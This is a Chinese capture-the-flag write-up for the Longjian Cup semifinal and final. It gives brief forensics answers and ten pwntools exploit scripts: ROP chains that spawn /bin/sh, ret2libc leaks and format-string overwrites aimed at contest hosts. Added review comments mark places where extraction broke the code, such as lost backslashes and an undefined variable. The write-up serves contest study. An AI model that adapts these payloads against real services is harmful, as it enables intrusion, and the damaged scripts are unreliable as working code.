题目附件:
https://pan.baidu.com/s/1LA2Wl619oi4WlimvqPkL6Q?pwd=av3j
半决赛
数据分析
easy
1.登录的密码是多少,请输入md5加密的32位小写字符串
用户名是__test__(md5一下就行了)
2.图片中隐藏的数字是多少
提取出11.zip之后,里面有个有问题的bmp文件,bmp直接打开,修复宽高
3.被加密的字符串是多少
流量里有一个私钥和加密数据
然后用cyberchef解密
easyshiro
1.easy-shiro-1
用工具可以爆破出key
3.攻击者植入了内存webshell,使用这个webshell做了什么,其中有flag
解密数据拿到aes的key
然后解密aes数据
session
session-1
通过注入得到的username是?
每次注入最后一个字符就是准确的字符,看出来是adminadmin111
session-2
除了root用户,还有哪个用户含有root权限
看得出是test
session-3
通过debug读取的哪个文件没有找到(绝对路径)
session-4
通过什么命令反弹的shell,提交md5加密的32位小写字符串
前两条反弹shell命令都400了,只有后面这条python反弹shell命令没得问题
RHG部分
01
# Half-final RHG 01. Connects to the contest service, sends one fixed payload,
# then reads whatever the service prints back and extracts a `flag{...}`
# marker. Every address below is hard-coded for the exact binary served in
# the contest and holds for nothing else.
from pwn import *
import json      # unused in this script
import requests  # unused in this script
# p = process("./bin")
p = remote("172.16.7.10", 13944)  # contest-time address from the writeup
context.arch = 'amd64'  # p64() packs 8-byte values; endianness comes from context
# NOTE(review): "x00" is almost certainly a backslash lost in the page
# extraction ("\x00"); as pasted this sends the literal letters x00.
p.sendlineafter("Please shoot me", "/bin/shx00")
# Gadget addresses used by the chain below (named after what they pop).
pop_rdi = 0x00000000004006a6
pop_rsi = 0x0000000000410023
pop_rdx = 0x000000000044b616
pop_rax = 0x00000000004005af
syscall = 0x000000000040129c
# 0x28 filler bytes followed by the packed chain. `bss` is never assigned
# anywhere in this script, so as pasted this line raises NameError; the value
# was presumably lost with the extraction -- confirm against the original.
payload = b'a'*(0x20+8) + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(pop_rax) + p64(0x3b) + p64(syscall)
p.sendlineafter(" lost. Do you admit it, yes or no?", payload)
# p.interactive()
sleep(0.1)  # brief pause before the next line is sent; the reason is not stated
p.sendline("cat /home/flag4.txt")
# recvall() drains the connection for up to 1 s. findall() returns a list, so
# `[0]` raises IndexError when no `flag{` marker came back -- a failed run
# dies here instead of printing an empty result.
flag = re.findall(b"flag{.+", p.recvall(timeout=1))[0].decode('utf-8')
print(flag)
02
# Half-final RHG 02. Generator-style chain (the per-line gadget comments and
# the sha256 next to IMAGE_BASE_0 look like tool output for the 32-bit
# challenge binary). Connects, waits for a keypress, sends one payload and
# drops into an interactive session.
from pwn import *
import json      # unused in this script
import requests  # unused in this script
# pro = process("./bin2")
pro = remote("172.16.7.10", 8960)  # contest-time address from the writeup
# pause() waits for user input before anything is sent. It is unconditional
# here, so the script also blocks when run against the remote service.
pause()
context.arch = 'amd64'  # set but not used below: all packing goes through pack('I')
from struct import pack
# 4-byte unsigned pack in *native* byte order ('I' has no '<' prefix), which
# matches the target only on a little-endian host.
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # 633a0cc474a6f90aea5ce7410cb2f9cbd158a9b917af5f3131b6e2c1672ae152
rebase_0 = lambda x : p(x + IMAGE_BASE_0)  # pack an offset relative to the image base
# Chain as emitted by the generator; each comment gives the resolved address
# and gadget. Offsets are specific to the binary whose hash is noted above.
rop = b''
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += b'//bi'
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092060)
rop += rebase_0(0x0000edc5) # 0x08056dc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += b'n/sh'
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092064)
rop += rebase_0(0x0000edc5) # 0x08056dc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += p(0x00000000)
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092068)
rop += rebase_0(0x0000edc5) # 0x08056dc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret;
rop += rebase_0(0x00092060)
rop += rebase_0(0x00000900) # 0x08048900: pop ecx; ret;
rop += rebase_0(0x00092068)
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092068)
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00026a20) # 0x0806ea20: int 0x80; ret;
# 0x5c filler bytes, then the chain.
payload = b'a'*(0x58+4) + rop
pro.sendlineafter("Please start your challenge", payload)
pro.interactive()  # hand the connection to the operator; no flag parsing here
03
# Half-final RHG 03. Shortest of the set: filler plus two hard-coded 32-bit
# values, then an interactive session. What the two addresses point to in
# bin3 is not stated on this page.
from pwn import *
import json      # unused in this script
import requests  # unused in this script
# pro = process("./bin3")
# pause()
pro = remote("172.16.7.10", 12227)  # contest-time address from the writeup
payload = b'a' * (0x58 + 4)  # 0x5c filler bytes (same layout as RHG 02)
payload += p32(0x080485BB)
payload += p32(0x0804B028)
pro.sendlineafter("portunity.", payload)
pro.interactive()
04
# Half-final RHG 04. Uses pwntools' fmtstr_payload() to build a single
# format-string write (8-byte value 0x4006f8 at 0x6009b8, parameter index 6)
# and sends it; the commented-out lines are earlier hand-built attempts that
# were kept for reference.
from pwn import *
import json      # unused in this script
import requests  # unused in this script
# pro = process("./bin4")
# pause()
pro = remote("172.16.7.10", 11473)  # contest-time address from the writeup
# payload = FmtStr.write()
# payload = p64(0x6009b8) + b"%6$n"
# 400660->4006f8
# fmtstr_payload() sizes its addresses from the current context, so the
# arch must be set before the call (presumably why it sits here).
context.arch = 'amd64'
payload = fmtstr_payload(6, {0x6009b8:0x4006f8})
# print(payload)
# payload = b"%248c%8$naaaaaaa" + p64(0x6009b8) + p64(0x6009b9) + p64(0x6009ba) + p64(0x6009bb)
# fmtstr_payload()
# payload = fmt_str(6, 1, 0x400660, 0xf8)
# 0x007ffff7db1d90
pro.sendlineafter("Welcome to RHG! Enter your fmt >>>", payload)
pro.interactive()
05
# Half-final RHG 05. 64-bit counterpart of RHG 02: a generator-emitted chain
# (gadget comments and the sha256 beside IMAGE_BASE_0 are tool output),
# packed with pack('Q') instead of pwntools' p64.
from pwn import *
import json      # unused in this script
import requests  # unused in this script
# pro = process("./bin5")
# pause()
pro = remote("172.16.7.10", 15843)  # contest-time address from the writeup
payload = b'a' * 0x28  # 0x28 filler bytes; the chain is appended below
from struct import pack
# 8-byte unsigned pack in *native* byte order ('Q' has no '<' prefix); this
# matches the target only on a little-endian host.
p = lambda x : pack('Q', x)
IMAGE_BASE_0 = 0x0000000000400000 # 055684d18c6ffbad428237201ebc251257542be7c438aa69d991dbbd817f352f
rebase_0 = lambda x : p(x + IMAGE_BASE_0)  # pack an offset relative to the image base
# Chain as emitted by the generator; each comment gives the resolved address
# and gadget. The 0xdeadbeef... entries fill the extra pops of the
# mov-qword gadget and are never used as addresses.
rop = b''
rop += rebase_0(0x000000000000d9eb) # 0x000000000040d9eb: pop r13; ret;
rop += b'//bin/sh'
rop += rebase_0(0x00000000000006a6) # 0x00000000004006a6: pop rdi; ret;
rop += rebase_0(0x00000000002ba0e0)
rop += rebase_0(0x0000000000068729) # 0x0000000000468729: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000000d9eb) # 0x000000000040d9eb: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x00000000000006a6) # 0x00000000004006a6: pop rdi; ret;
rop += rebase_0(0x00000000002ba0e8)
rop += rebase_0(0x0000000000068729) # 0x0000000000468729: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x00000000000006a6) # 0x00000000004006a6: pop rdi; ret;
rop += rebase_0(0x00000000002ba0e0)
rop += rebase_0(0x00000000000105c3) # 0x00000000004105c3: pop rsi; ret;
rop += rebase_0(0x00000000002ba0e8)
rop += rebase_0(0x000000000004bb06) # 0x000000000044bb06: pop rdx; ret;
rop += rebase_0(0x00000000002ba0e8)
rop += rebase_0(0x00000000000005af) # 0x00000000004005af: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x0000000000075355) # 0x0000000000475355: syscall; ret;
print(rop)  # debug aid: dump the raw chain bytes before sending
payload += rop
pro.sendlineafter("s elf file!", payload)
pro.interactive()
决赛
数据分析
ransom
2.找到hack用户的密码
这个流量包因为很多都是gzip压缩了看得很麻烦,所以要一个一个提取gzip的数据,然后解压缩,我注意到一个解压缩之后的文件
开头是<?cuc,这里应该是<?php,所以是往前算了12位,p对应c,h对应u,所以hack对应的是unpx
所以我们找到了passwd,看到了unpx,提交后面这个密码不对,猜测也是换了12位,但是换了过后还是不对
3.加密了多少用户
这个一直往后跟流,我们看到很大一段base64,解密之后就是加密的文件
解密:
Win7
1.windows7虚拟机的密码多少
通过爆破得到密码为somewhere
RHG部分
01
# Final RHG 01. Shared template for the final-round scripts: DEBUG=True runs
# the local attachment with a debugger pause, DEBUG=False talks to the contest
# host and hands the extracted flag to a local `submit` helper (the
# submit_flag module is not shown on this page). Indentation of the if/else
# bodies was lost in extraction and is reconstructed here.
from pwn import *
import re
from submit_flag import submit
DEBUG = False
if DEBUG:
    p = process("../attachments/bin20")
    context.log_level = 'debug'
    pause()  # wait for a keypress so a debugger can be attached first
else:
    p = remote("172.16.7.10", 12763)  # contest-time address from the writeup
### your code
# 0x58 filler bytes followed by three hard-coded 8-byte values; what they
# point to in bin20 is not identified on this page.
payload = b'a' * 0x58 + p64(0x00000000004007d3) + p64(0x0000000000602048) + p64(0x000000000040070B)
p.sendlineafter("You still only have one input opportunity.", payload)
### code done
if DEBUG:
    p.interactive()
else:
    p.sendline("cat " + "/home/flag5.txt")
    # recvall() drains for 0.5 s; `[0]` raises IndexError if no `flag{` came back.
    flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
    submit(flag)
02
# Final RHG 02. Same DEBUG/submit template as RHG 01; the payload is 0x28
# filler bytes and a single hard-coded 8-byte value. Indentation of the
# if/else bodies was lost in extraction and is reconstructed here.
from pwn import *
import re
from submit_flag import submit  # local helper, not shown on this page
DEBUG = False
if DEBUG:
    p = process("../attachments/bin21")
    context.log_level = 'debug'
    pause()  # wait for a keypress so a debugger can be attached first
else:
    p = remote("172.16.7.10", 7692)  # contest-time address from the writeup
### your code
payload = b'a' * 0x28 + p64(0x00000000004006EC)  # target of the address not stated here
p.sendlineafter("elf file!", payload)
### code done
if DEBUG:
    p.interactive()
else:
    p.sendline("cat " + "/home/flag4.txt")
    # recvall() drains for 0.5 s; `[0]` raises IndexError if no `flag{` came back.
    flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
    submit(flag)
03
# Final RHG 03. Two-stage 32-bit script: the first exchange reads 4 bytes
# back from the service and derives a base address from them, the second
# sends an address computed from that base. Indentation of the if/else
# bodies was lost in extraction and is reconstructed here.
from pwn import *
import re
from submit_flag import submit  # local helper, not shown on this page
DEBUG = False
if DEBUG:
    p = process("./bin22")
    context.log_level = 'debug'
    pause()  # wait for a keypress so a debugger can be attached first
else:
    p = remote("172.16.7.10", 19414)  # contest-time address from the writeup
    context.log_level = 'debug'  # verbose I/O logging even in the remote path
### your code
p.sendlineafter("you want to send?", "-1")  # "-1" is sent where a size is asked for; why is not shown
payload = b'a' * (0x1C + 4)  # 0x20 filler bytes, then three 32-bit values
payload += p32(0x80483B0)
payload += p32(0x804861b)
payload += p32(0x804b00c)
sleep(0.1)
p.sendline(payload)
# NOTE(review): "succeeded.n" (here and below) is very likely "succeeded.\n"
# with the backslash lost in extraction; as pasted, recvuntil() would wait
# for a literal "n" after the period.
p.recvuntil("succeeded.n")
# Read 4 leaked bytes and subtract a fixed offset. The name says libc base;
# the offset 0xe6e40 only holds for the libc build on the contest host.
libc = u32(p.recv(4)) - 0xe6e40
print(hex(libc))
p.sendlineafter("you want to send?", "-1")
payload = b'a' * (0x1C + 4)
payload += p32(libc + 0x3d2a5)  # address relative to the derived base; target not stated here
sleep(0.1)
p.sendline(payload)
p.recvuntil("succeeded.n")  # same lost-backslash caveat as above
### code done
if DEBUG:
    p.interactive()
else:
    p.sendline("cat " + "/home/flag2.txt")
    # recvall() drains for 0.5 s; `[0]` raises IndexError if no `flag{` came back.
    flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
    submit(flag)
04
# Final RHG 04. Same DEBUG/submit template; the payload is 0x28 filler bytes
# followed by a fixed chain of 8-byte values. Several of the addresses
# (0x4006a6, 0x4105c3, 0x44bb06, 0x4005af, 0x475355) match the gadget
# addresses listed in the half-final RHG 05 script. Indentation of the
# if/else bodies was lost in extraction and is reconstructed here.
from pwn import *
import re
from submit_flag import submit  # local helper, not shown on this page
DEBUG = False
if DEBUG:
    p = process("../attachments/bin23")
    context.log_level = 'debug'
    pause()  # wait for a keypress so a debugger can be attached first
else:
    p = remote("172.16.7.10", 17916)  # contest-time address from the writeup
### your code
payload = b'a' * 0x28 + p64(0x00000000004006a6) + p64(0x0000000000493328) + p64(0x00000000004105c3) + p64(0) + p64(0x000000000044bb06) + p64(0) + p64(0x00000000004005af) + p64(0x3b) + p64(0x0000000000475355)
p.sendlineafter(" this elf file!", payload)
### code done
if DEBUG:
    p.interactive()
else:
    p.sendline("cat " + "/home/flag3.txt")
    # recvall() drains for 0.5 s; `[0]` raises IndexError if no `flag{` came back.
    flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
    submit(flag)
05
# Final RHG 05. Two exchanges: the first sends a "%39$p" format specifier and
# parses the hex value printed back into a base address; the second sends a
# fmtstr_payload() write of an address derived from that base. Indentation
# of the if/else bodies was lost in extraction and is reconstructed here.
from pwn import *
import re
from submit_flag import submit  # local helper, not shown on this page
DEBUG = False
# DEBUG = True
if DEBUG:
    p = process("./bin24")
    context.log_level = 'debug'
    pause()  # wait for a keypress so a debugger can be attached first
else:
    p = remote("172.16.7.10", 6332)  # contest-time address from the writeup
    context.log_level = 'debug'  # verbose I/O logging even in the remote path
### your code
# NOTE(review): ">>>n" and the b"n" replaced below are very likely "\n" with
# the backslash lost in extraction; as pasted, the marker and the strip both
# act on a literal "n" instead of a newline.
p.sendlineafter("ter your fmt >>>n", "%39$p")
# 14 bytes is exactly "0x" + 12 hex digits; a shorter or longer reply breaks
# the int() parse. The offset 0x21c87 holds only for the contest host's libc.
libc = int(p.recv(14).replace(b"n", b"").decode("utf-8"), 16) - 0x21c87
print(hex(libc))
one = libc + 0x4f420  # address relative to the derived base; target not stated here
context.arch = 'amd64'  # fmtstr_payload() sizes its addresses from context
success(hex(one))
# One 8-byte write of `one` at 0x601028, parameter index 6.
payload = fmtstr_payload(6, {0x601028:p64(one)})
p.sendline(payload)
# pause()
# payload = fmtstr_payload(6, {0x601020 + 4:p64(one)[4:]}, 4)
# p.sendline(payload)
### code done
if DEBUG:
    p.interactive()
else:
    # p.interactive()
    p.sendline("cat " + "/home/flag1.txt")
    # recvall() drains for 0.5 s; `[0]` raises IndexError if no `flag{` came back.
    flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
    submit(flag)
原文始发于微信公众号(BeFun安全实验室):陇剑杯半决赛&决赛部分WP